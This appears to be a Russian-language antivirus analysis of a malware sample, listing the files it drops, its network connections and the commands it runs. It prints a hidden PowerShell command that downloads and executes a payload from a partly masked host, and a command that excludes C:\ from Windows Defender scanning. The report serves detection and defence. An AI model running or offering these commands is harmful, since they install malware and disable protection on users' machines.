Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://mo####aupdater.com/updates/fuck1.exe как %appdata%\fuck1.exe
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\abctfhghgdghghž.sct
- %APPDATA%\fuck1.exe
- %ALLUSERSPROFILE%\pizza.exe
Сетевая активность
Подключается к
- '45.##.136.244':5200
TCP
Запросы HTTP GET
- http://mo####aupdater.com/updates/fuck1.exe
UDP
- DNS ASK mo####aupdater.com
Другое
Создает и запускает на исполнение
- '%APPDATA%\fuck1.exe'
- '%ALLUSERSPROFILE%\pizza.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://mo####aupdater.com/updates/fuck1.exe','%APPDATA%\fuck1.exe');Start-Pro...' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath C:\' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath C:\
